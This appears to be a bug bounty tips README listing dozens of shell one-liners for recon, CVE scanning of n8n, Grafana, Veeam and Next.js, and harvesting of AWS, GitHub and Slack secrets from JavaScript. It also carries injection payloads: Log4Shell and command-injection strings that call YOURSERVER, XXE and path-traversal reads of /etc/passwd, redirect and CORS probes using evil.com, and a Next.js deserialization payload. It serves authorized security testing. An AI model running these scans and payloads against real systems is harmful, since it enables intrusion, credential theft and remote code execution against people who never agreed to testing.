β οΈ Affected: Multiple Grafana versions | β Fix: Update to latest patched version
π 10 Oneliners to hunt CVE-2026 vulnerabilities across subdomains at scale! π
subfinder -d target.com -silent | httpx -silent -title -tech-detect | tee alive_subs.txt | while read line; do echo "$line" | grep -qiE "(n8n|grafana|d-link)" && echo "[CVE-2026 TARGET] $line"; done | anew cve2026_targets.txtsubfinder -d target.com -silent | httpx -silent | xargs -I@ -P30 sh -c 'curl -s "@/rest/settings" 2>/dev/null | grep -q "versionCli" && echo "[N8N FOUND] @"' | tee n8n_subs.txt | xargs -I@ nuclei -u @ -t http/cves/2026/CVE-2026-21858.yaml -silentcat subdomains.txt | httpx -silent | xargs -I@ -P20 sh -c 'curl -s "@/rest/node-types" 2>/dev/null | grep -qi "git" && curl -s "@/rest/settings" 2>/dev/null | grep -qE "versionCli.*1\.(([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+)" && echo "[CVE-2026-21877 VULN] @"' | anew n8n_git_vuln.txtsubfinder -d target.com -silent | httpx -silent -path /api/frontend/settings -match-regex '"version":"' | tee grafana_subs.txt | xargs -I@ -P15 sh -c 'curl -sI "@/login?redirect=//evil.com" 2>/dev/null | grep -qi "location.*evil" && echo "[CVE-2025-4123 VULN] @"'subfinder -d target.com -silent | httpx -silent | nuclei -tags cve2026 -severity critical,high -c 50 -o cve2026_nuclei_results.txtcat subdomains.txt | httpx -silent | xargs -I@ -P25 sh -c 'for path in /webhook /webhook-test /rest/workflows; do curl -s -o /dev/null -w "%{http_code}" "@$path" 2>/dev/null | grep -qE "^(200|401|403)$" && echo "[N8N ENDPOINT] @$path" && break; done' | anew n8n_webhooks.txtsubfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -iE "(d-link|router|gateway|modem|dsl)" | tee router_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/dnscfg.cgi" 2>/dev/null | grep -qi "dns" && echo "[CVE-2026-0625 POTENTIAL] @"'subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -i "veeam" | tee veeam_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/api/v1/version" 2>/dev/null | grep -qE "13\.0\.[01]\.[0-9]+" && echo "[CVE-2025-59470 VULN] @"'subfinder -d target.com -silent | httpx -silent -json | jq -r 'select(.technologies != null) | "\(.url) \(.technologies[])"' | grep -iE "(n8n|grafana|veeam|next)" | while read url tech; do echo "[CVE-2026 CHECK] $url - $tech"; done | anew cve2026_tech_fingerprint.txtdomain="target.com"; mkdir -p recon_$domain && cd recon_$domain && subfinder -d $domain -silent | httpx -silent -title -tech-detect -json -o httpx_out.json && cat httpx_out.json | jq -r '.url' | nuclei -t ~/nuclei-templates/http/cves/2026/ -c 30 -o cve2026_vulns.txt && echo "[+] Found $(wc -l < cve2026_vulns.txt) CVE-2026 vulnerabilities!"π― Pro Tip: Combine with
notifyto get real-time alerts:... | notify -silent -provider slack
π― 10 Elite Oneliners for comprehensive reconnaissance - Multi-source enumeration, ASN discovery, JS analysis & more! π―
subfinder -d target.com -all -silent | anew subs.txt && assetfinder --subs-only target.com | anew subs.txt && amass enum -passive -norecursive -noalts -d target.com | anew subs.txt && cat subs.txt | httpx -silent -threads 200 -tech-detect -status-code -title -o alive_with_tech.txtCombines Subfinder + Assetfinder + Amass for maximum subdomain coverage, then validates with httpx + technology fingerprinting
echo "target.com" | dnsx -silent -resp-only -a | xargs -I{} whois -h whois.cymru.com {} | awk '{print $1}' | grep -E "AS[0-9]+" | xargs -I{} sh -c 'whois -h whois.radb.net -- "-i origin {}" | grep -Eo "([0-9.]+){4}/[0-9]+"' | mapcidr -silent | dnsx -silent -ptr -resp-only | anew asn_discovered_hosts.txtDiscovers ASN, enumerates IP blocks, performs reverse DNS to find hidden subdomains
cat alive.txt | xargs -P 50 -I{} sh -c 'echo {} | waybackurls & echo {} | gau --threads 10 --blacklist png,jpg,gif,svg,woff,ttf & echo {} | katana -d 3 -jc -kf all -silent' | uro | anew all_urls.txtParallel URL collection from Wayback Machine, Common Crawl, AlienVault + active crawling with smart deduplication
cat alive.txt | katana -silent -em js,json -jc -d 2 | httpx -silent -mc 200 | tee js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} | tee /tmp/js_$$.tmp | grep -oE "(api_key|apikey|api-key|secret|token|password|aws_access|AKIA[0-9A-Z]{16})" && cat /tmp/js_$$.tmp | grep -oE "/(api|v[0-9]|admin|internal)/[a-zA-Z0-9_/?=&-]+" | sort -u' | anew js_secrets_and_endpoints.txtFinds JS files, extracts hardcoded secrets (API keys, tokens, AWS keys) and hidden API endpoints
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt_subs.txt | dnsgen - | shuffledns -d target.com -r /usr/share/wordlists/resolvers.txt -silent -o permuted_subs.txt && cat permuted_subs.txt | httpx -silent -o alive_permuted.txtCT logs enumeration + intelligent permutation (api β api-dev, api-staging) with mass DNS resolution
cat subs.txt | naabu -silent -top-ports 1000 -exclude-cdn -c 50 | sed 's/:/ /g' | awk '{print $1":"$2}' | httpx -silent -probe -status-code -title -tech-detect -follow-redirects -random-agent -o ports_with_web_services.txtFast port scan + discovers web apps running on unusual ports (8080, 8443, 3000, etc)
ORG="target"; for dork in "org:$ORG password" "org:$ORG api_key" "org:$ORG secret" "org:$ORG token" "org:$ORG aws_access" "org:$ORG credentials"; do echo "[+] Searching: $dork"; gh search repos "$dork" --limit 100 | grep "^$ORG" | tee -a github_secrets.txt; sleep 2; doneAutomated GitHub dorking for secrets, credentials and sensitive data exposure
cat all_urls.txt | grep -oE '(s3\.amazonaws\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.s3\.amazonaws\.com|storage\.googleapis\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.blob\.core\.windows\.net)' | sort -u | tee cloud_buckets.txt | xargs -I{} sh -c 'curl -sI https://{} | grep -q "200\|403" && echo "[+] {} - Accessible"'Extracts and validates misconfigured cloud storage buckets from collected URLs
cat all_urls.txt | uro | grep "=" | unfurl keys | sort -u | tee all_params.txt && cat all_urls.txt | gf xss | tee xss_params.txt && cat all_urls.txt | gf ssrf | tee ssrf_params.txt && cat all_urls.txt | gf sqli | tee sqli_params.txt && cat all_urls.txt | gf redirect | tee redirect_params.txtExtracts unique parameters and categorizes by vulnerability type (XSS, SSRF, SQLi, Redirect)
DOMAIN="target.com"; DATE=$(date +%Y%m%d); mkdir -p recon_$DATE; cd recon_$DATE; subfinder -d $DOMAIN -all -silent | anew subs_$DATE.txt; cat subs_$DATE.txt | httpx -silent -threads 200 -o alive_$DATE.txt; cat alive_$DATE.txt | nuclei -t exposures/ -silent -o new_exposures_$DATE.txt; diff ../recon_$(date -d "yesterday" +%Y%m%d)/subs_*.txt subs_$DATE.txt 2>/dev/null | grep ">" | awk '{print $2}' > new_subs_$DATE.txt; [ -s new_subs_$DATE.txt ] && notify -silent -bulk < new_subs_$DATE.txtFull persistent recon pipeline - detects new assets daily and sends notifications
π― Pro Tip: Run oneliner #10 via cron for 24/7 monitoring:
0 */6 * * * /path/to/recon_monitor.sh
π― 10 Oneliners to extract endpoints, secrets and hidden APIs from JavaScript files! π―
cat alive.txt | katana -silent -em js -jc -d 3 | grep -E "\.js(\?|$)" | httpx -silent -mc 200 -content-length | awk '$NF > 500 {print $1}' | anew js_files.txt && cat js_files.txt | xargs -P 30 -I{} sh -c 'curl -sk {} -o js_downloaded/$(echo {} | md5sum | cut -d" " -f1).js 2>/dev/null'Discovers all JS files with Katana, filters by size (>500 bytes), downloads for offline analysis
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null' | grep -oE '["'"'"'](\/[a-zA-Z0-9_\-\.\/]+(\?[a-zA-Z0-9_\-\.=&]+)?)['"'"'"]' | sed 's/[\"'"'"']//g' | sort -u | grep -E "^/" | grep -vE "\.(css|png|jpg|svg|gif|woff|ico)$" | anew js_endpoints.txtExtracts all relative API paths from JavaScript, filters static assets
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" && echo "Found in: {}"' | tee aws_keys_js.txtHunts for AWS Access Key IDs (AKIA, ABIA, ACCA, ASIA patterns)
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AIza[0-9A-Za-z_-]{35}|[a-z0-9-]+\.firebaseio\.com|[a-z0-9-]+\.firebaseapp\.com)" && echo "[SOURCE] {}"' | tee google_firebase_keys.txtExtracts Google API keys and Firebase database/app URLs
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "([a-zA-Z0-9_-]+\.s3\.amazonaws\.com|s3\.amazonaws\.com\/[a-zA-Z0-9_-]+|[a-zA-Z0-9_-]+\.s3\.[a-z0-9-]+\.amazonaws\.com)" | sort -u' | anew s3_buckets_js.txt && cat s3_buckets_js.txt | xargs -I{} sh -c 'curl -sI https://{} 2>/dev/null | head -1 | grep -qE "200|403" && echo "[ACCESSIBLE] {}"'Finds S3 buckets in JS and validates accessibility
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[01])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" && echo "[SOURCE] {}"' | sort -u | tee internal_ips_js.txtDiscovers internal/private IP addresses leaked in JavaScript (10.x, 172.16-31.x, 192.168.x)
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(https://hooks\.slack\.com/services/[A-Za-z0-9/]+|[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27})" && echo "[SOURCE] {}"' | tee slack_discord_js.txtExtracts Slack webhook URLs and Discord bot tokens
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)" && echo "[SOURCE] {}"' | tee github_privkeys_js.txtFinds GitHub personal access tokens (all formats) and private key headers
β‘ 9. Email Addresses + Hidden Subdomains in JS
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u' | anew emails_js.txt && cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "https?://[a-zA-Z0-9._-]+\.target\.com[a-zA-Z0-9./?=_-]*"' | unfurl domains | sort -u | anew hidden_subdomains_js.txtExtracts email addresses and hidden subdomains referenced in JavaScript
TARGET="target.com"; mkdir -p js_recon_$TARGET && cat alive.txt | katana -silent -em js -jc -d 3 | grep -iE "\.js(\?|$)" | httpx -silent -mc 200 | anew js_recon_$TARGET/js_urls.txt && cat js_recon_$TARGET/js_urls.txt | xargs -P 30 -I{} sh -c 'curl -sk {} 2>/dev/null | tee -a js_recon_$TARGET/all_js.txt' && grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/aws_keys.txt; grep -oE "AIza[0-9A-Za-z_-]{35}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/google_keys.txt; grep -oE "ghp_[a-zA-Z0-9]{36}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/github_tokens.txt; grep -oE '["'"'"']/[a-zA-Z0-9_/-]+["'"'"']' js_recon_$TARGET/all_js.txt | tr -d '\"'"'"'' | sort -u > js_recon_$TARGET/endpoints.txt; echo "[+] JS Recon Complete! Check js_recon_$TARGET/"Complete JS recon pipeline: discovers JS files, downloads all, extracts AWS/Google/GitHub keys and API endpoints
π― Pro Tip: Use
nuclei -t exposures/tokens/on discovered secrets to validate if they're active!
π Critical RCE in React Server Components & Next.js - Under active exploitation! Added to CISA KEV π
cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txtcurl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt# Create payload.json (safe math check - no RCE)
echo '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txtcurl -X POST https://target.com -H "Next-Action: check" -F "0=@payload.json" -F "1=@trigger.txt" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txtcat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txtshodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txtnuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txtsubfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txtcurl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt
β οΈ Affected: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | β Fix: Update to React 19.0.1/19.1.2/19.2.1π― Key Detection: Apps accepting
Next-Actionheader + RSC deserialization = Potential RCE
echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txtcat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"cat js.txt | xargs -I@ curl -s @ | grep -E "(__proto__|constructor\.prototype)" | anew proto_pollution.txtcat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txtcat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txtcat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txtcat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"cat urls.txt | grep -iE "\.(xml|soap)" | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'cat urls.txt | qsreplace "\`curl YOURSERVER\`" | httpx -silent
cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silentcat alive.txt | xargs -I@ gowitness single @ -o screenshots/cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txtcurl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txtcat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txtcat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txtcat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txtcat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txtcat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txtcat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txtcat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txtcurl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"| Engine | Link | Description |
|---|---|---|
| Shodan | shodan.io | IoT & device search |
| Censys | censys.io | Internet scan data |
| Fofa | fofa.info | Cyberspace search |
| ZoomEye | zoomeye.org | Cyberspace mapping |
| Hunter | hunter.how | Asset discovery |
| Netlas | netlas.io | Attack surface |
| GreyNoise | greynoise.io | Internet scanners |
| Onyphe | onyphe.io | Cyber defense |
| CriminalIP | criminalip.io | Threat intel |
| FullHunt | fullhunt.io | Attack surface |
| Quake | quake.360.net | Cyberspace search |
| Leakix | leakix.net | Leak detection |
| URLScan | urlscan.io | URL analysis |
| DNSDumpster | dnsdumpster.com | DNS recon |
| crt.sh | crt.sh | Certificate search |
| SecurityTrails | securitytrails.com | DNS history |
| Pulsedive | pulsedive.com | Threat intel |
| VirusTotal | virustotal.com | File/URL analysis |
| PublicWWW | publicwww.com | Source code search |
| Grep.app | grep.app | GitHub code search |
| Wordlist | Link | Use Case |
|---|---|---|
| SecLists | GitHub | Everything |
| FuzzDB | GitHub | Fuzzing |
| Assetnote | wordlists.assetnote.io | Web content |
| OneListForAll | GitHub | Combined |
| jhaddix all.txt | GitHub | Directories |
| commonspeak2 | GitHub | Real-world |
- Web Application Hacker's Handbook
- Real-World Bug Hunting by Peter Yaworski
- Bug Bounty Bootcamp by Vickie Li
| Hunter | Hunter | Hunter |
|---|---|---|
| @bt0s3c | @MrCl0wnLab | @stokfredrik |
| @Jhaddix | @TomNomNom | @NahamSec |
| @zseano | @pry0cc | @pdiscoveryio |
| @jeff_foley | @haaborern | @0xacb |
π Click to see contribution guidelines
-
Fork the Repository
git clone https://github.com/KingOfBugbounty/KingOfBugBountyTips.git cd KingOfBugBountyTips -
Create a New Branch
git checkout -b feature/your-contribution
-
Add Your Content
- Add new one-liners with proper documentation
- Include source references and explanations
- Follow the existing format and structure
-
Submit Pull Request
- Write a clear description of your changes
- Reference any related issues
- Wait for review and feedback
- π― New bug bounty one-liners and techniques
- π§ Tool installation guides and tips
- π Additional resources and references
- π Bug fixes and improvements
- π Documentation enhancements
- π Translations to other languages
If this repository helped you in your bug bounty journey, consider supporting the project!
Give this repository a star if you found it helpful!
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β οΈ LEGAL NOTICE β οΈ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β This repository is for EDUCATIONAL PURPOSES ONLY β
β β
β β
DO: Use for authorized security testing β
β β
DO: Learn and understand the techniques β
β β
DO: Contribute and share knowledge β
β β
β β DON'T: Use for unauthorized testing β
β β DON'T: Use for malicious purposes β
β β DON'T: Violate laws or regulations β
β β
β The authors are NOT responsible for any misuse or damage β
β caused by this information. Always test responsibly! β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
| Resource | Link |
|---|---|
| π Homepage | King of Bug Bounty Tips |
| π οΈ KingRecon DOD | Automated Recon Tool |
| π§ BugBuntu OS | Download Here |
| πΊ YouTube Channel | OFJAAAH |
| π¬ Telegram Group | Join Community |
| π¦ Twitter/X | @ofjaaah |
| πΌ LinkedIn | Connect |
| π Report Issues | GitHub Issues |
| π Security Issues | Security Advisory |
To all contributors, bug bounty hunters, and the security community who make this project possible!
Last Updated: January 2026 | Version: 4.5
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "Stay curious, stay ethical, stay hungry" π΄ββ οΈ β
β Happy Hunting! π β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Made with β€οΈ by the Bug Bounty Community
